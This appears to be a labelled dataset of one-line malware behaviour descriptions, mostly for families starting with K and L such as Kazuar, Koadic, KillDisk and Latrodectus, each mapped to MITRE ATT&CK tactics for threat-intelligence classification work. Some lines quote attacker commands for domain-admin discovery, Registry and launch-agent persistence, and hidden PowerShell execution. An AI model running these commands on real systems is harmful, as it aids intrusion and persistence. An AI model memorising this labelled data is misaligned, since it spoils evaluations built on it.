Kasidet has the ability to identify any anti-virus installed on the infected system.,['TA0007:Discovery']
Kasidet has the ability to obtain a victim's system name and operating system version.,['TA0007:Discovery']
Kasidet can execute commands using cmd.exe.,['TA0002:Execution']
Kazuar gathers information about opened windows.,['TA0007:Discovery']
Kazuar has used compromised WordPress blogs as C2 servers.,['TA0011:Command and Control']
Kazuar can overwrite files with random data before deleting them.,['TA0040:Impact']
Kazuar uploads files from a specified directory to the C2 server.,['TA0009:Collection']
"If running in a Windows environment, Kazuar saves a DLL to disk that is injected into the explorer.exe process to execute the payload. Kazuar can also be configured to inject and execute within specific processes.","['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
Kazuar can accept multiple URLs for C2 servers.,['TA0011:Command and Control']
Kazuar can delete files.,['TA0005:Defense Evasion']
Kazuar uses FTP and FTPS to communicate with the C2 server.,['TA0011:Command and Control']
"Kazuar finds a specified directory, lists the files and metadata about those files.",['TA0007:Discovery']
"Kazuar downloads additional plug-ins to load on the victim’s machine, including the ability to upgrade and replace its own binary.",['TA0011:Command and Control']
Kazuar has used internal nodes on the compromised network for C2 communications.,['TA0011:Command and Control']
Kazuar gathers information on local groups and members on the victim’s machine.,['TA0007:Discovery']
Kazuar stages command output and collected data in files before exfiltration.,['TA0009:Collection']
Kazuar gathers information about local groups and members.,['TA0007:Discovery']
Kazuar is obfuscated using the open source ConfuserEx protector. Kazuar also obfuscates the name of created files/folders/mutexes and encrypts debug messages written to log files using the Rijndael cipher.,['TA0005:Defense Evasion']
Kazuar obtains a list of running processes through WMI querying and the ps command.,['TA0007:Discovery']
Kazuar adds a sub-key under several Registry run keys.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Kazuar can sleep for a specific time and be set to communicate at specific intervals.,['TA0010:Exfiltration']
Kazuar captures screenshots of the victim’s screen.,['TA0009:Collection']
Kazuar adds a .lnk file to the Windows startup folder.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Kazuar encodes communications to the C2 server in Base64.,['TA0011:Command and Control']
Kazuar gathers information on the system and local drives.,['TA0007:Discovery']
Kazuar gathers information about network adapters.,['TA0007:Discovery']
Kazuar gathers information on users.,['TA0007:Discovery']
Kazuar uses /bin/bash to execute commands on the victim’s machine.,['TA0002:Execution']
Kazuar captures images from the webcam.,['TA0009:Collection']
Kazuar uses HTTP and HTTPS to communicate with the C2 server. Kazuar can also act as a webserver and listen for inbound HTTP requests through an exposed API.,['TA0011:Command and Control']
Kazuar uses cmd.exe to execute commands on the victim’s machine.,['TA0002:Execution']
Kazuar obtains a list of running processes through WMI querying.,['TA0002:Execution']
Kazuar can install itself as a new service.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Kerrdown can use DLL side-loading to load malicious DLLs.,"['TA0005:Defense Evasion', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
"Kerrdown can decode, decrypt, and decompress multiple layers of shellcode.",['TA0005:Defense Evasion']
Kerrdown can download specific payloads to a compromised host based on OS architecture.,['TA0011:Command and Control']
Kerrdown has gained execution through victims opening malicious files.,['TA0002:Execution']
Kerrdown has gained execution through victims opening malicious links.,['TA0002:Execution']
"Kerrdown can encrypt, encode, and compress multiple layers of shellcode.",['TA0005:Defense Evasion']
Kerrdown has been distributed through malicious e-mail attachments.,['TA0001:Initial Access']
Kerrdown has been distributed via e-mails containing a malicious link.,['TA0001:Initial Access']
Kerrdown has the ability to determine if the compromised host is running a 32 or 64 bit OS architecture.,['TA0007:Discovery']
Kerrdown can use a VBS base64 decoder function published by Motobit.,['TA0002:Execution']
Kessel can RC4-encrypt credentials before sending to the C2.,['TA0009:Collection']
Kessel can create a reverse shell between the infected host and a specified system.,['TA0002:Execution']
Kessel has maliciously altered the OpenSSH binary on targeted systems to create a backdoor.,['TA0003:Persistence']
Kessel can split the data to be exilftrated into chunks that will fit in subdomains of DNS queries.,['TA0010:Exfiltration']
Kessel has decrypted the binary's configuration once the main function was launched.,['TA0005:Defense Evasion']
Kessel's configuration is hardcoded and RC4 encrypted within the binary.,['TA0005:Defense Evasion']
Kessel has exfiltrated information gathered from the infected system to the C2 server.,['TA0010:Exfiltration']
"Kessel can exfiltrate credentials and other information via HTTP POST request, TCP, and DNS.",['TA0010:Exfiltration']
Kessel can download additional modules from the C2 server.,['TA0011:Command and Control']
Kessel has trojanized the ssh_login and user-auth_pubkey functions to steal plaintext credentials.,"['TA0006:Credential Access', 'TA0005:Defense Evasion', 'TA0003:Persistence']"
Kessel can use a proxy during exfiltration if set in the configuration.,['TA0011:Command and Control']
Kessel has exfiltrated data via hexadecimal-encoded subdomain fields of DNS queries.,['TA0011:Command and Control']
"Kessel has collected the system architecture, OS version, and MAC address information.",['TA0007:Discovery']
Kessel has collected the DNS address of the infected host.,['TA0007:Discovery']
Variants of Kevin can communicate over DNS through queries to the server for constructed domain names with embedded information.,['TA0011:Command and Control']
Kevin can create directories to store logs and other collected data.,['TA0009:Collection']
Kevin can exfiltrate data to the C2 server in 27-character chunks.,['TA0010:Exfiltration']
Kevin can upload logs and other data from a compromised host.,['TA0009:Collection']
Kevin has Base64-encoded its configuration file.,['TA0005:Defense Evasion']
Kevin can send data from the victim host through a DNS C2 channel.,['TA0010:Exfiltration']
Kevin can assign hard-coded fallback domains for C2.,['TA0011:Command and Control']
Kevin can delete files created on the victim's machine.,['TA0005:Defense Evasion']
Kevin can hide the current window from the targeted user via the `ShowWindow` API function.,['TA0005:Defense Evasion']
Kevin can download files to the compromised host.,['TA0011:Command and Control']
Kevin can generate a sequence of dummy HTTP C2 requests to obscure traffic.,['TA0011:Command and Control']
Kevin can use the `ShowWindow` API to avoid detection.,['TA0002:Execution']
Kevin can use a custom protocol tunneled through DNS or HTTP.,['TA0011:Command and Control']
Kevin has renamed an image of `cmd.exe` with a random name followed by a `.tmpl` extension.,['TA0005:Defense Evasion']
Kevin can Base32 encode chunks of output files during exfiltration.,['TA0011:Command and Control']
Kevin can enumerate the OS version and hostname of a targeted machine.,['TA0007:Discovery']
Kevin can collect the MAC address and other information from a victim machine using `ipconfig/all`.,['TA0007:Discovery']
Kevin can sleep for a time interval between C2 communication attempts.,"['TA0005:Defense Evasion', 'TA0007:Discovery']"
Variants of Kevin can communicate with C2 over HTTP.,['TA0011:Command and Control']
Kevin can use a renamed image of `cmd.exe` for execution.,['TA0002:Execution']
Kevin can compile randomly-generated MOF files into the WMI repository to persistently run malware.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
KeyBoy attempts to collect passwords from browsers.,['TA0006:Credential Access']
KeyBoy uses the Dynamic Data Exchange protocol to download remote payloads.,['TA0002:Execution']
"In one version of KeyBoy, string obfuscation routines were used to hide many of the critical values referenced in the malware.",['TA0005:Defense Evasion']
KeyBoy has a command to launch a file browser or explorer on the system.,['TA0007:Discovery']
KeyBoy uses -w Hidden to conceal a PowerShell window that downloads a payload.,['TA0005:Defense Evasion']
KeyBoy has a download and upload functionality.,['TA0011:Command and Control']
KeyBoy installs a keylogger for intercepting credentials and keystrokes.,"['TA0009:Collection', 'TA0006:Credential Access']"
KeyBoy uses PowerShell commands to download and execute payloads.,['TA0002:Execution']
KeyBoy uses custom SSL libraries to impersonate SSL in C2 traffic.,['TA0011:Command and Control']
KeyBoy uses Python scripts for installing files and performing execution.,['TA0002:Execution']
KeyBoy has a command to perform screen grabbing.,['TA0009:Collection']
"KeyBoy can gather extended system information, such as information about the operating system, disks, and memory.",['TA0007:Discovery']
KeyBoy can determine the public or WAN IP address for the system.,['TA0007:Discovery']
KeyBoy time-stomped its DLL in order to evade detection.,['TA0005:Defense Evasion']
KeyBoy uses VBS scripts for installing files and performing execution.,['TA0002:Execution']
KeyBoy can launch interactive shells for communicating with the victim machine.,['TA0002:Execution']
KeyBoy installs a service pointing to a malicious DLL dropped to disk.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
KeyBoy issues the command reg add “HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon” to achieve persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Keydnap prompts the users for credentials.,"['TA0009:Collection', 'TA0006:Credential Access']"
Keydnap uses a Launch Agent to persist.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Keydnap uses a copy of tor2web proxy for HTTPS communications.,['TA0011:Command and Control']
Keydnap uses Python for scripting to execute additional commands.,['TA0002:Execution']
Keydnap uses a resource fork to present a macOS JPEG or text file icon rather than the executable's icon assigned by the operating system.,['TA0005:Defense Evasion']
Keydnap uses the keychaindump project to read securityd memory.,['TA0006:Credential Access']
Keydnap adds the setuid flag to a binary so it can easily elevate in the future.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
Keydnap puts a space after a false .jpg extension so that execution actually goes through the Terminal.app program.,['TA0005:Defense Evasion']
Keydnap uses HTTPS for command and control.,['TA0011:Command and Control']
"KillDisk has attempted to get the access token of a process by calling OpenProcessToken. If KillDisk gets the access token, then it attempt to modify the token privileges with AdjustTokenPrivileges.","['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
"KillDisk deletes Application, Security, Setup, and System Windows Event Logs.",['TA0005:Defense Evasion']
KillDisk deletes system files to make the OS unbootable. KillDisk also targets and deletes files with 35 different file extensions.,['TA0040:Impact']
KillDisk has a ransomware component that encrypts files with an AES key that is also RSA-1028 encrypted.,['TA0040:Impact']
KillDisk overwrites the first sector of the Master Boot Record with “0x00”.,['TA0040:Impact']
KillDisk has the ability to quit and delete itself.,['TA0005:Defense Evasion']
KillDisk has used the FindNextFile command as part of its file deletion process.,['TA0007:Discovery']
KillDisk registers as a service under the Plug-And-Play Support name.,['TA0005:Defense Evasion']
KillDisk has called the Windows API to retrieve the hard disk handle and shut down the machine.,['TA0002:Execution']
KillDisk uses VMProtect to make reverse engineering the malware more difficult.,['TA0005:Defense Evasion']
KillDisk has called GetCurrentProcess.,['TA0007:Discovery']
KillDisk terminates various processes to get the user to reboot the victim machine.,['TA0040:Impact']
KillDisk loads and executes functions from a DLL.,['TA0002:Execution']
KillDisk retrieves the hard disk name by calling the CreateFileA to \\.\PHYSICALDRIVE0 API.,['TA0007:Discovery']
KillDisk attempts to reboot the machine by terminating specific processes.,['TA0040:Impact']
Kinsing has searched bash_history for credentials.,['TA0006:Credential Access']
Kinsing has attempted to brute force hosts over SSH.,['TA0006:Credential Access']
Kinsing has created and run a Bitcoin cryptocurrency miner.,['TA0040:Impact']
Kinsing was executed with an Ubuntu container entry point that runs shell scripts.,['TA0002:Execution']
Kinsing has used crontab to download and run shell scripts every minute to ensure persistence.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Kinsing was run through a deployed Ubuntu container.,"['TA0005:Defense Evasion', 'TA0002:Execution']"
Kinsing was executed in an Ubuntu container deployed via an open Docker daemon API.,"['TA0001:Initial Access', 'TA0003:Persistence']"
Kinsing has used the find command to search for specific files.,['TA0007:Discovery']
Kinsing has downloaded additional lateral movement scripts from C2.,['TA0011:Command and Control']
Kinsing has used chmod to modify permissions on key files for use.,['TA0005:Defense Evasion']
Kinsing has searched for private keys.,['TA0006:Credential Access']
Kinsing has used ps to list processes.,['TA0007:Discovery']
Kinsing has used a script to parse files like /etc/hosts and SSH known_hosts to discover remote systems.,['TA0007:Discovery']
Kinsing has used SSH for lateral movement.,['TA0008:Lateral Movement']
Kinsing has used Unix shell scripts to execute commands in the victim environment.,['TA0002:Execution']
Kinsing has used valid SSH credentials to access remote hosts.,"['TA0005:Defense Evasion', 'TA0001:Initial Access', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Kinsing has communicated with C2 over HTTP.,['TA0011:Command and Control']
Kivars has the ability to uninstall malware from the infected host.,['TA0005:Defense Evasion']
Kivars has the ability to list drives on the infected host.,['TA0007:Discovery']
Kivars has the ability to conceal its activity through hiding active windows.,['TA0005:Defense Evasion']
Kivars has the ability to download and execute files.,['TA0011:Command and Control']
Kivars has the ability to initiate keylogging on the infected host.,"['TA0009:Collection', 'TA0006:Credential Access']"
Kivars has the ability to remotely trigger keyboard input and mouse clicks.,['TA0008:Lateral Movement']
Kivars has the ability to capture screenshots on the infected host.,['TA0009:Collection']
Koadic can use SSL and TLS for communications.,['TA0011:Command and Control']
Koadic has 2 methods for elevating integrity. It can bypass UAC through `eventvwr.exe` and `sdclt.exe`.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
Koadic can retrieve the current content of the user clipboard.,['TA0009:Collection']
Koadic can download files off the target system to send back to the server.,['TA0009:Collection']
Koadic can perform process injection by using a reflective DLL.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
Koadic can obtain a list of directories.,['TA0007:Discovery']
Koadic has used the command Powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden to hide its window.,['TA0005:Defense Evasion']
Koadic can download additional files and tools.,['TA0011:Command and Control']
Koadic can use mshta to serve additional payloads and to help schedule tasks for persistence.,['TA0005:Defense Evasion']
Koadic can gather hashed passwords by gathering domain controller hashes from NTDS.,['TA0006:Credential Access']
Koadic can scan for open TCP ports on the target network.,['TA0007:Discovery']
Koadic can scan local network for open SMB.,['TA0007:Discovery']
Koadic has used PowerShell to establish persistence.,['TA0002:Execution']
Koadic has added persistence to the `HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run` Registry key.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Koadic can use Regsvr32 to execute additional payloads.,['TA0005:Defense Evasion']
Koadic can enable remote desktop on the victim's machine.,['TA0008:Lateral Movement']
Koadic can use Rundll32 to execute additional payloads.,['TA0005:Defense Evasion']
Koadic has used scheduled tasks to add persistence.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Koadic can gather hashed passwords by dumping SAM/SECURITY hive.,['TA0006:Credential Access']
Koadic can run a command on another machine using PsExec.,['TA0002:Execution']
"Koadic can obtain the OS version and build, computer name, and processor architecture from a compromised host.",['TA0007:Discovery']
Koadic can retrieve the contents of the IP routing table as well as information about the Windows domain.,['TA0007:Discovery']
Koadic can identify logged in users across the domain and views user sessions.,['TA0007:Discovery']
Koadic performs most of its operations using Windows Script Host and runs arbitrary shellcode .,['TA0002:Execution']
Koadic has used HTTP for C2 communications.,['TA0011:Command and Control']
Koadic can open an interactive command-shell to perform command line functions on victim machines. Koadic performs most of its operations using Windows Script Host and to run arbitrary shellcode.,['TA0002:Execution']
Koadic can use WMI to execute commands.,['TA0002:Execution']
Kobalos's authentication and key exchange is performed using RSA-512.,['TA0011:Command and Control']
Kobalos can remove all command history on compromised hosts.,['TA0005:Defense Evasion']
Kobalos replaced the SSH client with a trojanized SSH client to steal credentials on compromised systems.,['TA0003:Persistence']
Kobalos can write captured SSH connection credentials to a file under the /var/run directory with a .pid extension for exfiltration.,['TA0009:Collection']
"Kobalos decrypts strings right after the initial communication, but before the authentication process.",['TA0005:Defense Evasion']
Kobalos can exfiltrate credentials over the network via UDP.,['TA0010:Exfiltration']
"Kobalos has used a compromised SSH client to capture the hostname, port, username and password used to establish an SSH connection from the compromised host.","['TA0009:Collection', 'TA0006:Credential Access']"
Kobalos can chain together multiple compromised machines as proxies to reach their final targets.,['TA0011:Command and Control']
Kobalos encrypts all strings using RC4 and bundles all functionality into a single function call.,['TA0005:Defense Evasion']
Kobalos's post-authentication communication channel uses a 32-byte-long password with RC4 for inbound and outbound traffic.,['TA0011:Command and Control']
Kobalos can record the hostname and kernel version of the target machine.,['TA0007:Discovery']
Kobalos can record the IP address of the target machine.,['TA0007:Discovery']
"Kobalos can modify timestamps of replaced files, such as ssh with the added credential stealer or sshd used to deploy Kobalos.",['TA0005:Defense Evasion']
Kobalos is triggered by an incoming TCP connection to a legitimate service from a specific source port.,"['TA0011:Command and Control', 'TA0005:Defense Evasion', 'TA0003:Persistence']"
Kobalos can spawn a new pseudo-terminal and execute arbitrary commands at the command prompt.,['TA0002:Execution']
The Komplex trojan supports file deletion.,['TA0005:Defense Evasion']
The Komplex payload is stored in a hidden directory at /Users/Shared/.local/kextd.,['TA0005:Defense Evasion']
The Komplex trojan creates a persistent launch agent called with $HOME/Library/LaunchAgents/com.apple.updates.plist with launchctl load -w ~/Library/LaunchAgents/com.apple.updates.plist.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
The OsInfo function in Komplex collects a running process list.,['TA0007:Discovery']
The Komplex C2 channel uses an 11-byte XOR algorithm to hide data.,['TA0011:Command and Control']
The OsInfo function in Komplex collects the current running username.,['TA0007:Discovery']
The Komplex C2 channel uses HTTP POST requests.,['TA0011:Command and Control']
"Before writing to disk, Kwampirs inserts a randomly generated string into the middle of the decrypted payload in an attempt to evade hash-based detections.",['TA0005:Defense Evasion']
Kwampirs decrypts and extracts a copy of its main DLL payload when executing.,['TA0005:Defense Evasion']
Kwampirs collects a list of domain groups with the command net localgroup /domain.,['TA0007:Discovery']
Kwampirs downloads additional files that are base64-encoded and encrypted with another cipher.,['TA0005:Defense Evasion']
Kwampirs uses a large list of C2 servers that it cycles through until a successful connection is established.,['TA0011:Command and Control']
"Kwampirs collects a list of files and directories in C:\ with the command dir /s /a c:\ >> ""C:\windows\TEMP\RANDOM.tmp"".",['TA0007:Discovery']
Kwampirs downloads additional files from C2 servers.,['TA0011:Command and Control']
Kwampirs collects a list of accounts with the command net users.,['TA0007:Discovery']
Kwampirs collects a list of users belonging to the local users and administrators groups with the commands net localgroup administrators and net localgroup users.,['TA0007:Discovery']
"Kwampirs establishes persistence by adding a new service with the display name ""WMI Performance Adapter Extension"" in an attempt to masquerade as a legitimate WMI service.",['TA0005:Defense Evasion']
Kwampirs collects a list of network shares with the command net share.,['TA0007:Discovery']
Kwampirs collects password policy information with the command net accounts.,['TA0007:Discovery']
Kwampirs collects a list of running services with the command tasklist /v.,['TA0007:Discovery']
Kwampirs collects a list of available servers with the command net view.,['TA0007:Discovery']
Kwampirs uses rundll32.exe in a Registry value added to establish persistence.,['TA0005:Defense Evasion']
Kwampirs copies itself over network shares to move laterally on a victim network.,['TA0008:Lateral Movement']
"Kwampirs collects OS version information such as registered owner details, manufacturer details, processor type, available storage, installed patches, hostname, version info, system date, and other system information by using the commands systeminfo, net config workstation, hostname, ver, set, and date /t.",['TA0007:Discovery']
"Kwampirs collects network adapter and interface information by using the commands ipconfig /all, arp -a and route print. It also collects the system's MAC address with getmac and domain configuration with net config workstation.",['TA0007:Discovery']
Kwampirs collects a list of active and listening connections by using the command netstat -nao as well as a list of available network mappings with net use.,['TA0007:Discovery']
Kwampirs collects registered owner details by using the commands systeminfo and net config workstation.,['TA0007:Discovery']
Kwampirs collects a list of running services with the command tasklist /svc.,['TA0007:Discovery']
Kwampirs creates a new service named WmiApSrvEx to establish persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
LIGHTWIRE can imbed itself into the legitimate `compcheckresult.cgi` component of Ivanti Connect Secure VPNs to enable command execution.,['TA0003:Persistence']
LIGHTWIRE can RC4 decrypt and Base64 decode C2 commands.,['TA0005:Defense Evasion']
LIGHTWIRE can RC4 encrypt C2 commands.,['TA0011:Command and Control']
LIGHTWIRE can use HTTP for C2 communications.,['TA0011:Command and Control']
LIGHTWIRE is a web shell capable of command execution and establishing persistence on compromised Ivanti Secure Connect VPNs.,['TA0003:Persistence']
LITTLELAMB.WOOLTEA can communicate over SSL using the private key from the Ivanti Connect Secure web server.,['TA0011:Command and Control']
LITTLELAMB.WOOLTEA can append malicious components to the `tmp/tmpmnt/bin/samba_upgrade.tar` archive inside the factory reset partition in attempt to persist post reset.,['TA0003:Persistence']
LITTLELAMB.WOOLTEA can initialize itself as a daemon to run persistently in the background.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
LITTLELAMB.WOOLTEA can monitor for system upgrade events by checking for the presence of `/tmp/data/root/dev`.,['TA0007:Discovery']
LITTLELAMB.WOOLTEA can function as a stand-alone backdoor communicating over the `/tmp/clientsDownload.sock` socket.,['TA0011:Command and Control']
LITTLELAMB.WOOLTEA has the ability to function as a SOCKS proxy.,['TA0011:Command and Control']
LITTLELAMB.WOOLTEA can check the type of Ivanti VPN device it is running on by executing `first_run` to identify the first four bytes of the motherboard serial number.,['TA0007:Discovery']
LOWBALL uses the Dropbox cloud storage service for command and control.,['TA0011:Command and Control']
"LOWBALL uses the Dropbox API to request two files, one of which is the same file as the one dropped by the malicious email attachment. This is most likely meant to be a mechanism to update the compromised host with a new version of the LOWBALL malware.",['TA0011:Command and Control']
LOWBALL command and control occurs via HTTPS over port 443.,['TA0011:Command and Control']
LaZagne can obtain credential information from /etc/shadow using the shadow.py module.,['TA0006:Credential Access']
LaZagne can perform credential dumping from MSCache to obtain account and password information.,['TA0006:Credential Access']
"LaZagne can obtain credentials from chats, databases, mail, and WiFi.",['TA0006:Credential Access']
"LaZagne can obtain credentials from databases, mail, and WiFi across multiple platforms.",['TA0006:Credential Access']
"LaZagne can obtain credentials from web browsers such as Google Chrome, Internet Explorer, and Firefox.",['TA0006:Credential Access']
LaZagne can obtain credentials from macOS Keychains.,['TA0006:Credential Access']
LaZagne can perform credential dumping from LSA secrets to obtain account and password information.,['TA0006:Credential Access']
LaZagne can perform credential dumping from memory to obtain account and password information.,['TA0006:Credential Access']
LaZagne can use the `/maps` and `/mem` files to identify regex patterns to dump cleartext passwords from the browser's process memory.,['TA0006:Credential Access']
LaZagne can obtain credentials from Vault files.,['TA0006:Credential Access']
Latrodectus has been obfuscated with a 129 byte sequence of junk data prepended to the file.,['TA0005:Defense Evasion']
Latrodectus can use the Windows Component Object Model to set scheduled tasks.,['TA0002:Execution']
Latrodectus can collect data from a compromised host using a stealer module.,['TA0009:Collection']
Latrodectus has the ability to check for the presence of debuggers.,"['TA0005:Defense Evasion', 'TA0007:Discovery']"
Latrodectus has the ability to deobfuscate encrypted strings.,['TA0005:Defense Evasion']
"Latrodectus can run `C:\Windows\System32\cmd.exe /c net group ""Domain Admins"" /domain` to identify domain administrator accounts.",['TA0007:Discovery']
"Latrodectus can identify domain groups through `cmd.exe /c net group ""Domain Admins"" /domain`.",['TA0007:Discovery']
Latrodectus can run `C:\Windows\System32\cmd.exe /c nltest /domain_trusts` to discover domain trusts.,['TA0007:Discovery']
Latrodectus can resolve Windows APIs dynamically by hash.,['TA0005:Defense Evasion']
Latrodectus has used a pseudo random number generator algorithm and a rolling XOR key to obfuscate strings.,['TA0005:Defense Evasion']
Latrodectus can exfiltrate encrypted system information to the C2 server.,['TA0010:Exfiltration']
Latrodectus has the ability to delete itself.,['TA0005:Defense Evasion']
Latrodectus can collect desktop filenames.,['TA0007:Discovery']
"Latrodectus can download and execute PEs, DLLs, and shellcode from C2.",['TA0011:Command and Control']
Latrodectus has used JavaScript files as part its infection chain during malicious spam email campaigns.,['TA0002:Execution']
Latrodectus has lured users into opening malicious email attachments for execution.,['TA0002:Execution']
Latrodectus has been executed through malicious links distributed in email campaigns.,['TA0002:Execution']
"Latrodectus has been packed to appear as a component to Bitdefender’s kernel-mode driver, TRUFOS.SYS.",['TA0005:Defense Evasion']
Latrodectus has called `msiexec` to install remotely-hosted MSI files.,['TA0005:Defense Evasion']
Latrodectus has used a two-tiered C2 configuration with tier one nodes connecting to the victim and tier two nodes connecting to backend infrastructure.,['TA0011:Command and Control']
Latrodectus can delete itself while its process is still running through the use of an alternate data stream.,['TA0005:Defense Evasion']
"Latrodectus has used multiple Windows API post exploitation including `GetAdaptersInfo`, `CreateToolhelp32Snapshot`, and `CreateProcessW`.",['TA0002:Execution']
Latrodectus can run `C:\Windows\System32\cmd.exe /c net view /all` to discover network shares.,['TA0007:Discovery']
Latrodectus can enumerate running processes including process grandchildren on targeted hosts.,['TA0007:Discovery']
Latrodectus can set an AutoRun key to establish persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Latrodectus can use rundll32.exe to execute downloaded DLLs.,['TA0005:Defense Evasion']
Latrodectus can create scheduled tasks for persistence.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Latrodectus has the ability to identify installed antivirus products.,['TA0007:Discovery']
The Latrodectus payload has been packed for obfuscation.,['TA0005:Defense Evasion']
Latrodectus has been distributed through reply-chain phishing emails with malicious attachments.,['TA0001:Initial Access']
Latrodectus has been distributed to victims through emails containing malicious links.,['TA0001:Initial Access']
Latrodectus has Base64-encoded the message body of a HTTP request sent to C2.,['TA0011:Command and Control']
Latrodectus can send RC4 encrypted data over C2 channels.,['TA0011:Command and Control']
"Latrodectus can determine if it is running in a virtualized environment by checking the OS version, checking the number of running processes, ensuring a 64-bit application is running on a 64-bit host, and checking if the host has a valid MAC address.","['TA0005:Defense Evasion', 'TA0007:Discovery']"
Latrodectus can gather operating system information.,['TA0007:Discovery']
Latrodectus can discover the IP and MAC address of a targeted host.,['TA0007:Discovery']
Latrodectus can discover the username of an infected host.,['TA0007:Discovery']
Latrodectus has the ability to restart compromised hosts.,['TA0040:Impact']
Latrodectus has routed C2 traffic using Keyhole VNC.,['TA0008:Lateral Movement']
Latrodectus can send registration information to C2 via HTTP `POST`.,['TA0011:Command and Control']
Latrodectus has used Google Firebase to download malicious installation scripts.,['TA0011:Command and Control']
The Latrodectus command handler can use `cmdexe` to run multiple discovery commands.,['TA0002:Execution']
Latrodectus has used WMI in malicious email infection chains to facilitate the installation of remotely-hosted files.,['TA0002:Execution']
LightNeuron contains a function to encrypt and store emails that it collects.,['TA0009:Collection']
LightNeuron can be configured to automatically collect files under a specified directory.,['TA0009:Collection']
LightNeuron can be configured to automatically exfiltrate files under a specified directory.,['TA0010:Exfiltration']
LightNeuron can collect files from a local system.,['TA0009:Collection']
LightNeuron has used AES and XOR to decrypt configuration files and commands.,['TA0005:Defense Evasion']
LightNeuron encrypts its configuration files with AES-256.,['TA0005:Defense Evasion']
LightNeuron exfiltrates data over its email C2 channel.,['TA0010:Exfiltration']
LightNeuron has a function to delete files.,['TA0005:Defense Evasion']
LightNeuron has the ability to download and execute additional files.,['TA0011:Command and Control']
"LightNeuron can store email data in files and directories specified in its configuration, such as C:\Windows\ServiceProfiles\NetworkService\appdata\Local\Temp\.",['TA0009:Collection']
LightNeuron uses SMTP for C2.,['TA0011:Command and Control']
"LightNeuron has used filenames associated with Exchange and Outlook for binary and configuration files, such as winmail.dat.",['TA0005:Defense Evasion']
LightNeuron is capable of starting a process using CreateProcess.,['TA0002:Execution']
LightNeuron collects Exchange emails matching rules specified in its configuration.,['TA0009:Collection']
LightNeuron can be configured to exfiltrate data during nighttime or working hours.,['TA0010:Exfiltration']
LightNeuron is controlled via commands that are embedded into PDFs and JPGs using steganographic methods.,['TA0011:Command and Control']
LightNeuron uses AES to encrypt C2 traffic.,['TA0011:Command and Control']
LightNeuron gathers the victim computer name using the Win32 API call GetComputerName.,['TA0007:Discovery']
LightNeuron gathers information about network adapters using the Win32 API call GetAdaptersInfo.,['TA0007:Discovery']
"LightNeuron is capable of modifying email content, headers, and attachments during transit.",['TA0040:Impact']
LightNeuron has used a malicious Microsoft Exchange transport agent for persistence.,['TA0003:Persistence']
LightNeuron is capable of executing commands via cmd.exe.,['TA0002:Execution']
Linfo creates a backdoor through which remote attackers can obtain data from local systems.,['TA0009:Collection']
Linfo creates a backdoor through which remote attackers can change C2 servers.,['TA0011:Command and Control']
Linfo creates a backdoor through which remote attackers can delete files.,['TA0005:Defense Evasion']
Linfo creates a backdoor through which remote attackers can list contents of drives and search for files.,['TA0007:Discovery']
Linfo creates a backdoor through which remote attackers can download files onto compromised hosts.,['TA0011:Command and Control']
Linfo creates a backdoor through which remote attackers can retrieve a list of running processes.,['TA0007:Discovery']
Linfo creates a backdoor through which remote attackers can change the frequency at which compromised hosts contact remote C2 infrastructure.,['TA0010:Exfiltration']
Linfo creates a backdoor through which remote attackers can retrieve system information.,['TA0007:Discovery']
Linfo creates a backdoor through which remote attackers can start a remote shell.,['TA0002:Execution']
Linux Rabbit sends the payload from the C2 server as an encoded URL parameter.,['TA0011:Command and Control']
Linux Rabbit attempts to gain access to the server via SSH.,"['TA0001:Initial Access', 'TA0003:Persistence']"
Linux Rabbit brute forces SSH passwords in order to attempt to gain access and install its malware onto the server.,['TA0006:Credential Access']
Linux Rabbit opens a socket on port 22 and if it receives a response it attempts to obtain the machine's hostname and Top-Level Domain.,['TA0007:Discovery']
Linux Rabbit maintains persistence on an infected machine through rc.local and .bashrc files.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Linux Rabbit acquires valid SSH accounts through brute force.,"['TA0005:Defense Evasion', 'TA0001:Initial Access', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
LiteDuke has the ability to decrypt and decode multiple layers of obfuscation.,['TA0005:Defense Evasion']
LiteDuke can securely delete files by first writing random data to the file.,['TA0005:Defense Evasion']
LiteDuke has the ability to download files.,['TA0011:Command and Control']
LiteDuke can query the Registry to check for the presence of HKCU\Software\KasperskyLab.,['TA0007:Discovery']
LiteDuke can create persistence by adding a shortcut in the CurrentVersion\Run Registry key.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
LiteDuke has the ability to check for the presence of Kaspersky security software.,['TA0007:Discovery']
LiteDuke has been packed with multiple layers of encryption.,['TA0005:Defense Evasion']
LiteDuke has used image files to hide its loader component.,['TA0005:Defense Evasion']
LiteDuke can enumerate the CPUID and BIOS version on a compromised system.,['TA0007:Discovery']
LiteDuke has the ability to discover the proxy configuration of Firefox and/or Opera.,['TA0007:Discovery']
LiteDuke can enumerate the account name on a targeted system.,['TA0007:Discovery']
LiteDuke can wait 30 seconds before executing additional code if security software is detected.,"['TA0005:Defense Evasion', 'TA0007:Discovery']"
LiteDuke can use HTTP GET requests in C2 communications.,['TA0011:Command and Control']
"LitePower can send collected data, including screenshots, over its C2 channel.",['TA0010:Exfiltration']
